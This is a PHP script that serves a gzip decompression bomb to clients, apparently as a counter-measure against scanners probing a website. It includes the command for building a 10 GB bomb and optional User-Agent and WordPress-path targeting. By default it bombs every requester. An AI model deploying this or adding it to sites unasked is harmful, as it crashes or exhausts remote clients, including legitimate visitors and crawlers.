Скрипт для отсылки gzip-бомбы сканеру, атакующему веб-сайт, или источнику, пытающемуся вызвать вредоносный PHP-код (A script that serves a gzip decompression bomb to a scanner attacking the site, or to a source trying to invoke malicious PHP code.)
<?php
/*
Serves a gzip "decompression bomb" to whoever requests this script.
See the original write-up at https://habrahabr.ru/post/332580/
Create the bomb file on Linux with: dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip
(10 GB of zeros compresses to roughly 10 MB on disk; the client has to inflate the full 10 GB.)
The bomb must be plain gzip — that is exactly what the Content-Encoding header sent below promises.
*/
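// Path to the pre-built gzip bomb. Resolve it against this script's own
// directory: a bare relative path is looked up from the web server's current
// working directory, which is not necessarily the folder this file lives in.
$bomb_file_path = __DIR__ . '/10G.gzip';

/* // Uncomment to enable
// WordPress-specific targeting: only serve the bomb to requests that look like
// scanners (by User-Agent) or that probe WordPress paths on a non-WordPress site.
//
// Caveats before enabling:
//  - User-Agent is attacker-controlled and trivially spoofed; this only catches
//    tools that do not bother to change their default string.
//  - A prefix match on the request path also hits any legitimate visitor or
//    search-engine crawler that follows a stale "wp-..." link.
//  - Deliberately crashing a remote client may carry legal risk in some
//    jurisdictions; confirm that before turning this on.
// Both header values are cast to string because filter_input() returns null
// when the header is absent, and strpos()/startsWith() expect strings.
$agent = (string) filter_input(INPUT_SERVER, 'HTTP_USER_AGENT');
// Strip the leading "/" so the prefixes below match "wp-login.php", not "/wp-login.php".
$url = ltrim((string) filter_input(INPUT_SERVER, 'REQUEST_URI'), '/');
// Case-insensitive: scanner User-Agent strings vary in capitalisation (Nikto's
// default string is believed to capitalise its own name — verify against a live sample).
if (stripos($agent, 'nikto') !== false || stripos($agent, 'sqlmap') !== false
    || startsWith($url, 'wp-') || startsWith($url, 'wordpress') || startsWith($url, 'wp/'))
{
    sendGZIPBomb($bomb_file_path);
    exit();
}
*/

// Unconditional mode: every request that reaches this script gets the bomb.
// Comment these two lines out if the WordPress-specific block above is enabled.
// sendGZIPBomb() is declared further down in this file; PHP hoists unconditional
// top-level function declarations, so calling it here is fine.
sendGZIPBomb($bomb_file_path);
exit();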
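/**
 * Stream a pre-compressed gzip file to the client as the response body,
 * labelled with Content-Encoding: gzip so the client inflates it itself.
 *
 * The client is told the encoded (on-disk) length, which is what
 * Content-Length means when Content-Encoding is set; the decompressed size
 * is never disclosed. The header is unremarkable because most web servers
 * gzip responses by default.
 *
 * @param string $file_path Path to the gzip-compressed bomb file.
 * @return bool True when the file was sent; false when the file is missing or
 *              unreadable, or when headers were already sent (in which case
 *              nothing is written, rather than emitting PHP warnings and a
 *              body with a bogus Content-Length).
 */
function sendGZIPBomb($file_path){
    // Refuse to send anything if the bomb is not there: the original code would
    // otherwise emit warnings and a "Content-Length: " header with no value.
    if (!is_file($file_path) || !is_readable($file_path)) {
        error_log("sendGZIPBomb: bomb file missing or unreadable: " . $file_path);
        http_response_code(500);
        return false;
    }
    $size = filesize($file_path);
    if ($size === false) {
        error_log("sendGZIPBomb: cannot determine size of " . $file_path);
        http_response_code(500);
        return false;
    }
    // Discard every level of output buffering (not just the innermost one) so
    // nothing precedes the gzip stream and the headers can still go out.
    while (ob_get_level() > 0) {
        ob_end_clean();
    }
    // Once headers are on the wire the Content-Encoding label can no longer be
    // set, and the raw bytes would just be garbage to the client.
    if (headers_sent()) {
        error_log("sendGZIPBomb: headers already sent, not sending bomb");
        return false;
    }
    header("Content-Encoding: gzip");
    header("Content-Length: " . $size);
    // Stream the compressed file straight to the client.
    readfile($file_path);
    return true;
}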
/**
 * Prefix test: true when $a begins with $b (byte-wise, case-sensitive).
 * PHP function names are case-insensitive, so callers may spell this
 * startswith() as well.
 *
 * @param string $a The string to inspect.
 * @param string $b The prefix to look for.
 * @return bool
 */
function startsWith($a, $b) {
    $position = strpos($a, $b);
    return 0 === $position;
}